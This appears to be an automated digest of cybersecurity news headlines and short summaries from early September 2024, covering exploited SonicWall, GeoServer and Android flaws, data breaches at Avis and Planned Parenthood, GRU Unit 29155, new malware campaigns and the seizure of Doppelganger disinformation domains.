        SonicWall SSLVPN access control flaw is now exploited in attacks

        exploits
        2024-09-06 https://www.bleepingcomputer.com/news/security/sonicwall-sslvpn-access-control-flaw-is-now-exploited-in-attacks/
        SonicWall is warning that a recently fixed access control flaw tracked as CVE-2024-40766 in SonicOS is now "potentially" exploited in attacks, urging admins to apply patches as soon as possible. [...] "

        Autosummary:
        SonicWall Gen 5 running SonicOS version 5.9.2.14-12o and older – fixed in SonicOS version 5.9.2.14-13o
        SonicWall Gen 6 running SonicOS version 6.5.4.14-109n and older – fixed in 6.5.2.8-2n (for SM9800, NSsp 12400, NSsp 12800) and version 6.5.4.15-116n (for other Gen 6 Firewalls)
        SonicWall Gen 7 running SonicOS version 7.0.1-5035 and older – not reproducible in 7.0.1-5035 and later. "


        Exposed: Russian military Unit 29155 does digital sabotage, espionage

        rusia-ucrania
        2024-09-06 https://www.helpnetsecurity.com/2024/09/06/unit-29155/

        The US Department of Justice has named five Russian computer hackers as members of Unit 29155 – i.e., the 161st Specialist Training Center of the Russian General Staff Main Intelligence Directorate (GRU) – which they deem responsible for the 2022 WhisperGate wiper malware attacks on Ukrainian government organizations and critical infrastructure, and subsequently computer network operations against NATO member and ally countries. “Since early 2022, the primary focus of the cyber actors appears to be … More

        The post Exposed: Russian military Unit 29155 does digital sabotage, espionage appeared first on Help Net Security.

        "

        Autosummary: Active Directory (AD) enumeration (Impacket, ldapdomaindump, BloodHound); vulnerability scanning (Acunetix, Amass, Droopescan, eScan, and JoomScan). They use CVE exploit scripts from GitHub repositories to target vulnerable IoT and networking devices, as well as computers and web servers, and virtual private servers to host their tools, perform reconnaissance, exploit victim infrastructure, and exfiltrate victim data. "


        GeoServer Vulnerability Targeted by Hackers to Deliver Backdoors and Botnet Malware

        exploits
        2024-09-06 https://thehackernews.com/2024/09/geoserver-vulnerability-targeted-by.html
        A recently disclosed security flaw in OSGeo GeoServer GeoTools has been exploited as part of multiple campaigns to deliver cryptocurrency miners, botnet malware such as Condi and JenX, and a known backdoor called SideWalk. The security vulnerability is a critical remote code execution bug (CVE-2024-36401, CVSS score: 9.8) that could allow malicious actors to take over susceptible instances. In "

        Autosummary: "


        Transport for London staff faces systems disruptions after cyberattack

        ciber
        2024-09-06 https://www.bleepingcomputer.com/news/security/transport-for-london-staff-faces-systems-disruptions-after-cyberattack/
        Transport for London, the city’s public transportation agency, revealed today that its staff has limited access to systems and email due to measures implemented in response to a Sunday cyberattack. [...] "

        Autosummary: "Many of our staff have limited access to systems and email and, as a result, we may be delayed or unable to respond to your query or any webforms previously submitted," TfL said in a Friday update. "


        Car rental giant Avis discloses data breach impacting customers

        financial
        2024-09-06 https://www.bleepingcomputer.com/news/security/car-rental-giant-avis-discloses-data-breach-impacting-customers/
        American car rental giant Avis disclosed a data breach after attackers breached one of its business applications last month and stole customer personal information. [...] "

        Autosummary: "


        SonicWall Urges Users to Patch Critical Firewall Flaw Amid Possible Exploitation

        exploits
        2024-09-06 https://thehackernews.com/2024/09/sonicwall-urges-users-to-patch-critical.html
        SonicWall has revealed that a recently patched critical security flaw impacting SonicOS may have come under active exploitation, making it essential that users apply the patches as soon as possible. The vulnerability, tracked as CVE-2024-40766, carries a CVSS score of 9.3 out of a maximum of 10. "An improper access control vulnerability has been identified in the SonicWall SonicOS management "

        Autosummary: "


        Bitcoin ATM scams skyrocket – Week in security with Tony Anscombe

        financial
        2024-09-06 https://www.welivesecurity.com/en/videos/bitcoin-atm-scams-skyrocket-week-security-tony-anscombe/
        The schemes disproportionately victimize senior citizens, as those aged 60 or over were more than three times as likely as younger adults to fall prey to the scams "

        Autosummary: "


        Car rental company Avis discloses a data breach

        financial
        2024-09-06 https://securityaffairs.com/168119/data-breach/car-rental-giant-avis-discloses-data-breach.html
        Car rental giant Avis disclosed a data breach that impacted one of its business applications in August, compromising customers’ personal information. Car rental company Avis notified customers impacted in an August data breach. Threat actors breached one of its business applications and gained access to some of the customers’ personal information. “We discovered on August […] "

        Autosummary: Pierluigi Paganini, September 06, 2024. Car rental giant Avis disclosed a data breach that impacted one of its business applications in August, compromising customers’ personal information. "


        SonicWall warns that SonicOS bug exploited in attacks

        exploits
        2024-09-06 https://securityaffairs.com/168112/hacking/sonicwall-sonicos-bug-exploited.html
        Recently fixed access control SonicOS vulnerability, tracked as CVE-2024-40766, is potentially exploited in attacks in the wild, SonicWall warns. SonicWall warns that a recently fixed access control flaw, tracked as CVE-2024-40766 (CVSS v3 score: 9.3), in SonicOS is now potentially exploited in attacks. “An improper access control vulnerability has been identified in the SonicWall SonicOS management […] "

        Autosummary: Below is the list of impacted platforms:
        SOHO (Gen 5): 5.9.2.14-12o and older versions
        Gen6 Firewalls (SOHOW, TZ 300, TZ 300W, TZ 400, TZ 400W, TZ 500, TZ 500W, TZ 600, NSA 2650, NSA 3600, NSA 3650, NSA 4600, NSA 4650, NSA 5600, NSA 5650, NSA 6600, NSA 6650, SM 9200, SM 9250, SM 9400, SM 9450, SM 9600, SM 9650, TZ 300P, TZ 600P, SOHO 250, SOHO 250W, TZ 350, TZ 350W): 6.5.4.14-109n and older versions
        Gen7 Firewalls (TZ270, TZ270W, TZ370, TZ370W, TZ470, TZ470W, TZ570, TZ570W, TZ570P, TZ670, NSa 2700, NSa 3700, NSa 4700, NSa 5700, NSa 6700, NSsp 10700, NSsp 11700, NSsp 13700): SonicOS build version 7.0.1-5035 and older versions
        Pierluigi Paganini, September 06, 2024. Recently fixed access control SonicOS vulnerability, tracked as CVE-2024-40766, is potentially exploited in attacks in the wild, SonicWall warns. "


        Car rental giant Avis data breach impacts over 299,000 customers

        financial
        2024-09-06 https://www.bleepingcomputer.com/news/security/car-rental-giant-avis-data-breach-impacts-over-299-000-customers/
        American car rental giant Avis disclosed a data breach after attackers breached one of its business applications last month and stole customer personal information. [...] "

        Autosummary: According to data breach notification letters sent to impacted customers on Wednesday and filed with California’s Office of the Attorney General, the company took action to stop the unauthorized access, launched an investigation with the help of external cybersecurity experts, and reported the incident to relevant authorities after learning of the breach on August 5. "


        How to gamify cybersecurity preparedness

        ciber
        2024-09-05 https://www.helpnetsecurity.com/2024/09/05/cybersecurity-preparedness-training/

        Organizations’ preparedness and resilience against threats isn’t keeping pace with cybercriminals’ advancements. Some CEOs still believe that cybersecurity requires episodic intervention rather than ongoing attention. That isn’t the reality for many companies; cyber threat preparedness requires a concerted training effort, so cybersecurity teams are ready when an attack occurs. Cybersecurity practitioners often share curiosity as a key personality trait, and many enjoy hands-on learning approaches. This naturally makes gamified experiences like competitions and capture-the-flags a … More

        The post How to gamify cybersecurity preparedness appeared first on Help Net Security.

        "

        Autosummary: Gamified training unearths unexpected skills: Technical acumen on cybersecurity teams is table stakes – gamified training helps uncover and develop the soft skills needed to successfully thwart or remediate a threat, such as empathy, delegation, and time management. Understanding company priorities, initiatives, and risks: With the cost of a data breach nearing $4.5 million, organizations can’t afford to have teams at odds during an emergency, when every minute counts. "


        Planned Parenthood confirms cyberattack as RansomHub claims breach

        ciber
        2024-09-05 https://www.bleepingcomputer.com/news/security/planned-parenthood-confirms-cyberattack-as-ransomhub-claims-breach/
        Planned Parenthood has confirmed it suffered a cyberattack affecting its IT systems, forcing it to take parts of its infrastructure offline to contain the damage. [...] "

        Autosummary: Planned Parenthood listed on RansomHub’s extortion site (Source: BleepingComputer). Last week, the FBI, CISA, the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Department of Health and Human Services (HHS) issued a joint advisory about RansomHub’s trend of targeting healthcare organizations, of which this is another example. "


        Binarly Transparency Platform 2.5 identifies critical vulnerabilities before they can be exploited

        exploits
        2024-09-05 https://www.helpnetsecurity.com/2024/09/05/binarly-transparency-platform-2-5/

        Binarly announced Binarly Transparency Platform 2.5 with several features designed to enhance software vulnerability management and improve security posture across enterprise environments. The key highlight of this release is the innovative Reachability Analysis, a feature that identifies and prioritizes vulnerabilities based on their exploitability within the system’s execution flow, allowing for more targeted and effective remediation. With the introduction of Reachability Analysis, Binarly’s Transparency Platform 2.5 provides a truly innovative method to evaluate risk by … More

        The post Binarly Transparency Platform 2.5 identifies critical vulnerabilities before they can be exploited appeared first on Help Net Security.

        "

        Autosummary: Building on the powerful capabilities of the Binary Risk Intelligence Core introduced earlier this year, Binarly Transparency Platform 2.5 introduces several enhancements designed to provide comprehensive visibility and control over firmware security: Custom semantic detection rules: allows product security teams to create rules for detecting vulnerabilities discovered internally, even before they are assigned a CVE, enabling proactive hunting for broader security risks. "


        The future of automotive cybersecurity: Treating vehicles as endpoints

        industry ciber
        2024-09-05 https://www.helpnetsecurity.com/2024/09/05/automotive-cybersecurity-future/

        The automotive industry is facing many of the same cybersecurity risks and threats that successful organizations in other sectors are up against, but it’s also battling some distinct ones. In this Help Net Security interview, Josh Smith, Principal Threat Analyst at Nuspire – a managed security services provider that has deep roots in the automotive sector and protects clients like GM and Subaru – talks about the present risks and threats and opines on the … More

        The post The future of automotive cybersecurity: Treating vehicles as endpoints appeared first on Help Net Security.

        "

        Autosummary: Advanced persistent threat groups, such as APT4, APT6 and APT37, are notorious for their focus on intellectual property theft, especially in industries where proprietary technology and competitive advantage are critical. Given the proprietary nature and immense competitive value of automotive technology, these firms must be particularly vigilant against espionage attempts, as the consequences of a successful attack could be devastating both financially and reputationally, potentially leading to lost market share and long-term erosion of trust. Every technology, no matter how advanced, comes with its own set of weaknesses, and automotive technology is no exception. "


        Malware Attackers Using MacroPack to Deliver Havoc, Brute Ratel, and PhantomCore

        exploits
        2024-09-05 https://thehackernews.com/2024/09/malware-attackers-using-macropack-to.html
        Threat actors are likely employing a tool designated for red teaming exercises to serve malware, according to new findings from Cisco Talos. The program in question is a payload generation framework called MacroPack, which is used to generate Office documents, Visual Basic scripts, Windows shortcuts, and other formats for penetration testing and social engineering assessments. It was developed "

        Autosummary: "


        New Cross-Platform Malware KTLVdoor Discovered in Attack on Chinese Trading Firm

        exploits
        2024-09-05 https://thehackernews.com/2024/09/new-cross-platform-malware-ktlvdoor.html
        The Chinese-speaking threat actor known as Earth Lusca has been observed using a new backdoor dubbed KTLVdoor as part of a cyber attack targeting an unnamed trading company based in China. The previously unreported malware is written in Golang, and thus is a cross-platform weapon capable of targeting both Microsoft Windows and Linux systems. "KTLVdoor is a highly obfuscated malware that "

        Autosummary: "


        Haiti expands state of emergency to whole country

        government
        2024-09-05 https://www.bbc.com/news/articles/ckgwv0232ppo
        The US Secretary of State will visit Haiti this week to discuss its “democratic transition”. "

        Autosummary: "


        Fake OnlyFans cybercrime tool infects hackers with malware

        exploits
        2024-09-05 https://www.bleepingcomputer.com/news/security/fake-onlyfans-cybercrime-tool-infects-hackers-with-malware/
        Hackers are targeting other hackers with a fake OnlyFans tool that claims to help steal accounts but instead infects threat actors with the Lumma stealer information-stealing malware. [...] "

        Autosummary: Malicious GitHub repository (Source: Veriti). Specifically, the GitHub repository contains executables that resemble checkers for Disney+ accounts, Instagram, and a supposed Mirai botnet builder: Disney+ account thieves are targeted with "DisneyChecker.exe"; Instagram hackers are lured by "InstaCheck.exe"; wannabe botnet creators are lured with "ccMirai.exe". Digging deeper into the malware’s communications, Veriti’s researchers found a set of ".shop" domains that acted as command and control (C2) servers, sending commands to Lumma and receiving the exfiltrated data. "


        NIST Cybersecurity Framework (CSF) and CTEM – Better Together

        ciber
        2024-09-05 https://thehackernews.com/2024/09/nist-cybersecurity-framework-csf-and.html
        It’s been a decade since the National Institute of Standards and Technology (NIST) introduced its Cybersecurity Framework (CSF) 1.0. Created following a 2013 Executive Order, NIST was tasked with designing a voluntary cybersecurity framework that would help organizations manage cyber risk, providing guidance based on established standards and best practices. While this version was originally "

        Autosummary: It’s a comprehensive collection of guidelines, best practices, and recommendations, divided into five core functions: Identify, Protect, Detect, Respond, and Recover. To make this happen, CTEM programs integrate advanced tech like exposure assessment, security validation, automated security validation, attack surface management, and risk prioritization. CSF 2.0 brings with it some changes; among other advancements, it adds in "Govern" as a first step, because, according to ISC.2.org, "the CSF’s governance component emphasizes that cybersecurity is a major source of enterprise risk that senior leaders must consider alongside others such as finance and reputation. "


        Is Russian group APT28 behind the cyber attack on the German air traffic control agency (DFS)?

        rusia-ucrania
        2024-09-05 https://securityaffairs.com/168070/apt/apt28-cyber-attack-german-air-traffic-control-agency-dfs.html
        A cyber attack hit the German air traffic control agency (DFS), disrupting its operations; experts attribute it to the Russia-linked group APT28. A cyber attack targeted the German Air Traffic Control Agency (DFS), as reported by Spiegel and European Truth. DFS, based in Langen near Frankfurt, confirmed that attackers breached its office connection but confirmed that […] "

        Autosummary: The APT28 group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. "


        Colombia to investigate police purchase of Pegasus spyware

        latam
        2024-09-05 https://www.bbc.com/news/articles/ckg5en18qvxo
        Colombian police paid an Israeli firm $11m in cash for the spyware, Colombia’s president revealed. "

        Autosummary: "


        Hacker trap: Fake OnlyFans tool backstabs cybercriminals, steals passwords

        ciber
        2024-09-05 https://www.bleepingcomputer.com/news/security/hacker-trap-fake-onlyfans-tool-backstabs-cybercriminals-steals-passwords/
        Hackers are targeting other hackers with a fake OnlyFans tool that claims to help steal accounts but instead infects threat actors with the Lumma stealer information-stealing malware. [...] "

        Autosummary: Malicious GitHub repository (Source: Veriti). Specifically, the GitHub repository contains executables that resemble checkers for Disney+ accounts, Instagram, and a supposed Mirai botnet builder: Disney+ account thieves are targeted with "DisneyChecker.exe"; Instagram hackers are lured by "InstaCheck.exe"; wannabe botnet creators are lured with "ccMirai.exe". Digging deeper into the malware’s communications, Veriti’s researchers found a set of ".shop" domains that acted as command and control (C2) servers, sending commands to Lumma and receiving the exfiltrated data. "


        Planned Parenthood partly offline after ransomware attack

        exploits ransomware
        2024-09-05 https://www.malwarebytes.com/blog/news/2024/09/planned-parenthood-partly-offline-after-ransomware-attack
        Intermountain Planned Parenthood of Montana suffered a cyberattack which has been claimed by a ransomware group "

        Autosummary: As laid out in a recent joint advisory by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the Multi-State Information Sharing and Analysis Center (MS-ISAC), and the Department of Health and Human Services (HHS), RansomHub is a relatively new but very active Ransomware-as-a-Service group known to target healthcare organizations and other critical infrastructure sectors. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "


        Cicada ransomware – what you need to know

        exploits ransomware
        2024-09-05 https://www.tripwire.com/state-of-security/cicada-ransomware-what-you-need-know
        Cicada (also known as Cicada3301) is a sophisticated ransomware, written in Rust, that has claimed more than 20 victims since its discovery in June 2024. Read more in my article on the Tripwire State of Security blog. "

        Autosummary: While there’s no definitive proof, the similarities between Cicada and BlackCat, including the use of Rust, evasion techniques, and timing, suggest a possible connection. According to a blog post by security researchers at Morphisec, at least 21 companies, predominantly in North America and the UK, have been hit by Cicada since June 18, 2024. "


        U.S. Seizes 32 Pro-Russian Propaganda Domains in Major Disinformation Crackdown

        rusia-ucrania
        2024-09-05 https://thehackernews.com/2024/09/us-seizes-32-pro-russian-propaganda.html
        The U.S. Department of Justice (DoJ) on Wednesday announced the seizure of 32 internet domains used by a pro-Russian propaganda operation called Doppelganger as part of a sweeping set of actions. Accusing the Russian government-directed foreign malign influence campaign of violating U.S. money laundering and criminal trademark laws, the agency called out companies Social Design Agency (SDA), "

        Autosummary: The complete list of domains, which mimic legitimate news outlets like Der Spiegel, Fox News, Le Monde, and The Washington Post, is as follows: tribunalukraine.info, rrn.media, ukrlm.info, faz.ltd, spiegel.agency, lemonde.ltd, leparisien.ltd, rbk.media, 50statesoflie.media, meisterurian.io, artichoc.io, vip-news.org, acrosstheline.press, mypride.press, truthgate.us, warfareinsider.us, shadowwatch.us, pravda-ua.com, waronfakes.com, holylandherald.com, levinaigre.net, grenzezank.com, lexomnium.com, uschina.online, honeymoney.press, sueddeutsche.co, tagesspiegel.co, bild.work, fox-news.top, fox-news.in, forward.pw, and washingtonpost.pm. Concurrent with the domain seizures, the Treasury Department sanctioned 10 individuals and two entities for engaging in efforts to influence and undermine confidence in the electoral process. "


        Earth Lusca adds multiplatform malware KTLVdoor to its arsenal

        exploits
        2024-09-05 https://securityaffairs.com/168078/malware/earth-lusca-malware-ktlvdoor.html
        The Chinese-speaking threat actor Earth Lusca used the new backdoor KTLVdoor in an attack against a trading company in China. Trend Micro researchers spotted the Chinese-speaking threat actor Earth Lusca using a new multiplatform backdoor called KTLVdoor. The Earth Lusca group has been active since at least the first half of 2023; it primarily targeted […] "

        Autosummary: It supports commands for downloading/uploading files, exploring the file system, launching an interactive shell, executing shellcode, and conducting various scans (e.g., TCP, RDP, TLS, Ping, Web). "


        Russian military hackers linked to critical infrastructure attacks

        rusia-ucrania
        2024-09-05 https://www.bleepingcomputer.com/news/security/us-and-allies-link-russian-military-hackers-behind-critical-infrastructure-attacks-to-gru-unit-29155/
        The United States and its allies have linked a group of Russian hackers (tracked as Cadet Blizzard and Ember Bear) behind global critical infrastructure attacks to Unit 29155 of Russia's Main Directorate of the General Staff of the Armed Forces (also known as GRU). [...] "

        Autosummary: GRU Unit 29155 junior officers (U.S. State Department). Today, the U.S. State Department also announced a reward of up to $10 million through its Rewards for Justice program for information on Vladislav Borovkov, Denis Igorevich Denisenko, Yuriy Denisov, Dmitry Yuryevich Goloshubov, and Nikolay Aleksandrovich Korchagin, five of the Russian military intelligence officers believed to be part of GRU's Unit 29155. "


        LiteSpeed Cache bug exposes 6 million WordPress sites to takeover attacks

        exploits
        2024-09-05 https://www.bleepingcomputer.com/news/security/litespeed-cache-bug-exposes-6-million-wordpress-sites-to-takeover-attacks/
        Yet another critical-severity vulnerability has been discovered in LiteSpeed Cache, a caching plugin for speeding up user browsing on over 6 million WordPress sites. [...] "

        Autosummary: The plugin's vendor, LiteSpeed Technologies, addressed the problem by moving the debug log to a dedicated folder ("/wp-content/litespeed/debug/"), randomizing log filenames, removing the option to log cookies, and adding a dummy index file for extra protection. "


        Apache fixes critical OFBiz remote code execution vulnerability

        exploits
        2024-09-05 https://www.bleepingcomputer.com/news/security/apache-fixes-critical-ofbiz-remote-code-execution-vulnerability/
        Apache has fixed a critical security vulnerability in its open-source OFBiz (Open For Business) software, which could allow attackers to execute arbitrary code on vulnerable Linux and Windows servers. [...] "

        Autosummary: "


        Trump says Musk could head "government efficiency" force

        government
        2024-09-05 https://www.bbc.com/news/articles/c74lgwkrmrpo
        In a speech at an economic club Thursday, the former president endorsed the Tesla boss's idea for a task force on government spending "

        Autosummary: "


        Cybersecurity jobs available right now: September 4, 2024

        ciber
        2024-09-04 https://www.helpnetsecurity.com/2024/09/04/cybersecurity-jobs-available-right-now-september-4-2024/

        Cyber Systems Operations | United States Air Force | USA | On-site. The United States Air Force is looking for a Cyber Systems Operations Specialist to design, install, and support systems to ensure they operate properly and remain secure from outside intrusion. Cloud Security Service Manager | SAP Fioneer | Germany | Remote. You will be responsible for driving continuous improvement of security standards and system hardening, supporting audits … More

        The post Cybersecurity jobs available right now: September 4, 2024 appeared first on Help Net Security.

        "

        Autosummary: Cyber Security Analyst | Suncare Community Services | Australia | On-site. In the role of Cyber Security Analyst within the ICT team, you will play a role in safeguarding our ICT infrastructure and data by implementing and maintaining robust security practices, controlling access to ICT systems, supporting the ISMS, and conducting regular audits to identify and mitigate potential risks. "


        Ransomware attacks escalate as critical sectors struggle to keep up

        exploits
        2024-09-04 https://www.helpnetsecurity.com/2024/09/04/ransomware-cybersecurity-threat/

        Ransomware remains a concerning cybersecurity threat, with attacks becoming more frequent, severe, and costly. Recent reports highlight alarming trends, including increased attacks on critical sectors like healthcare, education, and manufacturing. The US, leading in global ransomware incidents, faces an exceptionally high risk, especially in education and healthcare. Organizations are frequently hit multiple times, and ransom payments, while common, often fail to prevent further disruption. Most ransomware attacks occur between 1 a.m. and 5 a.m. Malwarebytes … More

        The post Ransomware attacks escalate as critical sectors struggle to keep up appeared first on Help Net Security.

        "

        Autosummary: Zscaler | Zscaler ThreatLabz 2024 Ransomware Report | August 2024 The findings from the report uncovered a record-breaking ransom payment of $75 million to the Dark Angels ransomware group, which is nearly double the highest publicly known ransomware payout, and an overall 18% increase in ransomware attacks year-over-year. "


        Protecting national interests: Balancing cybersecurity and operational realities

        ciber
        2024-09-04 https://www.helpnetsecurity.com/2024/09/04/david-ferbrache-beyond-blue-national-cybersecurity/

        With cyber threats becoming increasingly sophisticated and targeting critical infrastructure, in this Help Net Security interview, David Ferbrache, managing director of Beyond Blue, discusses the current state of cybersecurity readiness and resilience. Ferbrache talks about the complexities of managing both traditional and digital infrastructures, the critical role of regulatory bodies, the urgent need for public and private sector collaboration to counteract these threats, and much more. With the increasing sophistication of cyber threats targeting national … More

        The post Protecting national interests: Balancing cybersecurity and operational realities appeared first on Help Net Security.

        "

        Autosummary: While we still depend on traditional national infrastructure providers like water, oil, gas, and electricity, we increasingly rely on the digital ecosystem. Cybersecurity is one of the most evolving aspects of national security, with a changing threat landscape, new attack tactics, and an increasingly complex and interdependent critical national infrastructure. "


        Hackers Use Fake GlobalProtect VPN Software in New WikiLoader Malware Attack

        exploits
        2024-09-04 https://thehackernews.com/2024/09/hackers-use-fake-globalprotect-vpn.html
        A new malware campaign is spoofing Palo Alto Networks' GlobalProtect VPN software to deliver a variant of the WikiLoader (aka WailingCrab) loader by means of a search engine optimization (SEO) campaign. The malvertising activity, observed in June 2024, is a departure from previously observed tactics wherein the malware has been propagated via traditional phishing emails, Unit 42 researchers "

        Autosummary: "The combination of spoofed, compromised and legitimate infrastructure leveraged by WikiLoader campaigns reinforces the malware authors' attention to building an operationally secure and robust loader, with multiple [command-and-control] configurations," the researchers said. "


        Vulnerability allows Yubico security keys to be cloned

        exploits
        2024-09-04 https://www.helpnetsecurity.com/2024/09/04/yubico-security-keys-vulnerability/

        Researchers have unearthed a cryptographic vulnerability in popular Yubico (FIDO) hardware security keys and modules that may allow attackers to clone the devices. But the news is not as catastrophic as it may seem at first glance. “The attacker would need physical possession of the YubiKey, Security Key, or YubiHSM [hardware security module], knowledge of the accounts they want to target, and specialized equipment to perform the necessary attack. Depending on the use case, the … More

        The post Vulnerability allows Yubico security keys to be cloned appeared first on Help Net Security.

        "

        Autosummary: Yubico delivers fix, but… Yubico has evaluated its products and found that the vulnerability affects:
        • YubiKey 5 Series, YubiKey 5 FIPS Series, and YubiKey 5 CSPN Series devices with firmware prior to 5.7
        • YubiKey Bio Series devices with firmware prior to 5.7.2
        • Security Key Series, all versions with firmware prior to 5.7
        • YubiHSM 2 and YubiHSM 2 FIPS modules with firmware prior to 2.4.0
        “The (…) vulnerability primarily impacts FIDO use cases because the FIDO standard relies on the affected functionality by default. "


        How to avoid election related scams

        financial
        2024-09-04 https://www.malwarebytes.com/blog/news/2024/09/how-to-avoid-election-related-scams
        With the elections at full throttle we are seeing several types of scams resurfacing and undoubtedly more will come "

        Autosummary: With the US election campaigns at full throttle, scammers have taken a renewed interest in the ways this can be used to defraud people, often using the same tactics legitimate campaigns leverage for support (emails, text messages, phone calls, and social media pleas). Donate safely: If you decide to sponsor a candidate, do not follow any links provided in text messages, emails, or on social media. A survey site that asks for personal details and credit card information. Another method besides surveys is voter registration scams, where the scammer poses as an election official and asks you to update your voter registration, or tells you that you can register to vote over the phone. "


        Google Confirms CVE-2024-32896 Exploited in the Wild, Releases Android Security Patch

        exploits
        2024-09-04 https://thehackernews.com/2024/09/google-confirms-cve-2024-32896.html
        Google has released its monthly security updates for the Android operating system to address a known security flaw that it said has come under active exploitation in the wild. The high-severity vulnerability, tracked as CVE-2024-32896 (CVSS score: 7.8), relates to a case of privilege escalation in the Android Framework component. According to the description of the bug in the NIST National "

        Autosummary: "


        Cisco fixes root escalation vulnerability with public exploit code

        exploits
        2024-09-04 https://www.bleepingcomputer.com/news/security/cisco-fixes-root-escalation-vulnerability-with-public-exploit-code/
        Cisco has fixed a command injection vulnerability in the Identity Services Engine (ISE) with public exploit code that lets attackers escalate privileges to root on vulnerable systems. [...] "

        Autosummary: "


        “Hello pervert” sextortion scam includes new threat of Pegasus—and a picture of your home

        financial
        2024-09-04 https://www.malwarebytes.com/blog/news/2024/09/hello-pervert-sextortion-scam-includes-new-threat-of-pegasus-and-a-picture-of-your-home
        “Hello pervert” sextortion mails keep adding new features to their email to increase credibility and urge victims to pay "

        Autosummary: Though Pegasus is indeed a powerfully invasive spyware tool, the threat of its use, as included in these scam emails, is entirely empty. It provides access to your webcam, messengers, emails, call records, etc. How to react to “Hello pervert” emails: First and foremost, never reply to emails of this kind. "


        Microchip Technology confirms data was stolen in cyberattack

        ciber
        2024-09-04 https://www.bleepingcomputer.com/news/security/microchip-technology-confirms-data-was-stolen-in-cyberattack/
        American semiconductor supplier Microchip Technology Incorporated has confirmed that employee information was stolen from systems compromised in an August cyberattack, which was later claimed by the Play ransomware gang. [...] "

        Autosummary: Microchip Technology entry on Play ransomware's leak site (BleepingComputer). They claimed to have stolen a wide range of information from Microchip Technology's compromised systems, including "private and personal confidential data, clients documents, budget, payroll, accounting, contracts, taxes, IDs, finance information," and more. "


        US cracks down on Russian disinformation before 2024 election

        rusia-ucrania
        2024-09-04 https://www.bleepingcomputer.com/news/security/us-cracks-down-on-russian-disinformation-before-2024-election/
        The FBI seized 32 web domains used by the Doppelgänger Russian-linked influence operation network in a disinformation campaign targeting the American public ahead of this year's presidential election. [...] "

        Autosummary: The complete list of domains used by Doppelgänger for spreading disinformation that the FBI has seized includes: tribunalukraine.info, rrn.media, ukrlm.info, faz.ltd, spiegel.agency, lemonde.ltd, leparisien.ltd, rbk.media, 50statesoflie.media, meisterurian.io, artichoc.io, vip-news.org, acrosstheline.press, mypride.press, truthgate.us, warfareinsider.us, shadowwatch.us, pravda-ua.com, waronfakes.com, holylandherald.com, levinaigre.net, grenzezank.com, lexomnium.com, uschina.online, honeymoney.press, sueddeutsche.co, tagesspiegel.co, bild.work, fox-news.top, fox-news.in, forward.pw, and washingtonpost.pm. "


        Google fixed actively exploited Android flaw CVE-2024-32896

        exploits
        2024-09-04 https://securityaffairs.com/168047/mobile-2/google-fixed-actively-exploited-android-flaw-cve-2024-32896.html
        Google addressed a security vulnerability in its Android operating system that is actively exploited in attacks in the wild. Google addressed a high-severity vulnerability, tracked as CVE-2024-32896 (CVSS score: 7.8), in its Android operating system that is under active exploitation in the wild. The vulnerability CVE-2024-32896 is a privilege escalation in the Android Framework component. […] "

        Autosummary: The maintainers of GrapheneOS, an Android-based, open source, privacy and security-focused mobile operating system, explained that CVE-2024-32896 results from the partial mitigation of another flaw tracked as CVE-2024-29748. "


        Russian Military Cyber Actors Target US and Global Critical Infrastructure

        rusia-ucrania
        2024-09-04 https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-249a

        Summary

        The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and National Security Agency (NSA) assess that cyber actors affiliated with the Russian General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155) are responsible for computer network operations against global targets for the purposes of espionage, sabotage, and reputational harm since at least 2020. GRU Unit 29155 cyber actors began deploying the destructive WhisperGate malware against multiple Ukrainian victim organizations as early as January 13, 2022. These cyber actors are separate from other known and more established GRU-affiliated cyber groups, such as Unit 26165 and Unit 74455.

        To mitigate this malicious cyber activity, organizations should take the following actions today:

        • Prioritize routine system updates and remediate known exploited vulnerabilities.
        • Segment networks to prevent the spread of malicious activity.
        • Enable phishing-resistant multifactor authentication (MFA) for all externally facing account services, especially for webmail, virtual private networks (VPNs), and accounts that access critical systems.

        This Cybersecurity Advisory provides tactics, techniques, and procedures (TTPs) associated with Unit 29155 cyber actors—both during and succeeding their deployment of WhisperGate against Ukraine—as well as further analysis (see Appendix A) of the WhisperGate malware initially published in the joint advisory, Destructive Malware Targeting Organizations in Ukraine, published February 26, 2022.

        FBI, CISA, NSA and the following partners are releasing this joint advisory as a collective assessment of Unit 29155 cyber operations since 2020:

        • U.S. Department of th "

          Autosummary: Unit 29155 cyber actors have been observed obtaining the respective exploit scripts for, but not exploiting, the following CVEs: CVE-2020-1472 (Microsoft: Windows Server); CVE-2021-26084 (Atlassian Confluence Server and Data Center); CVE-2021-3156 (Red Hat: Privilege Escalation via Command Line Argument Parsing); CVE-2021-4034 (Red Hat: Polkit Privilege Escalation); CVE-2022-27666 (Red Hat: Heap Buffer Overflow Flaw). Estonian Internal Security Service (KAPO); Latvian State Security Service (VDD); Security Service of Ukraine (SBU); Computer Emergency Response Team of Ukraine (CERT-UA); Canadian Security Intelligence Service (CSIS); Communications Security Establishment Canada (CSE); Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC); United Kingdom National Cyber Security Centre (NCSC-UK). For additional information on Russian state-sponsored malicious cyber activity and related indictments, see the recent U.S. Department of Justice (DOJ) press releases for June 26, 2024, and September 5, 2024, FBI’s Cyber Crime webpage, and CISA’s Russia Cyber Threat Overview and Advisories webpage. Acunetix: Unit 29155 cyber actors leveraged both Acunetix and Nmap to identify open ports, services, and vulnerabilities for networks [T1595.002].[6] Amass: Unit 29155 cyber actors leveraged both Amass and VirusTotal to obtain subdomains for target websites "


          A third of organizations suffered a SaaS data breach this year

          financial
          2024-09-03 https://www.helpnetsecurity.com/2024/09/03/saas-data-breach-2024/

          While SaaS security is finally getting the attention it deserves, there’s still a significant gap between intent and implementation. Ad hoc strategies and other practices still fall short of a security program. The move toward decentralization has generated confusion over responsibilities, and many organizations remain unaware of which SaaS applications are used, by whom, and what is risky, according to AppOmni. Source: AppOmni. “Despite greater awareness and effort, things are getting worse. Just as there … More

          The post A third of organizations suffered a SaaS data breach this year appeared first on Help Net Security.

          "

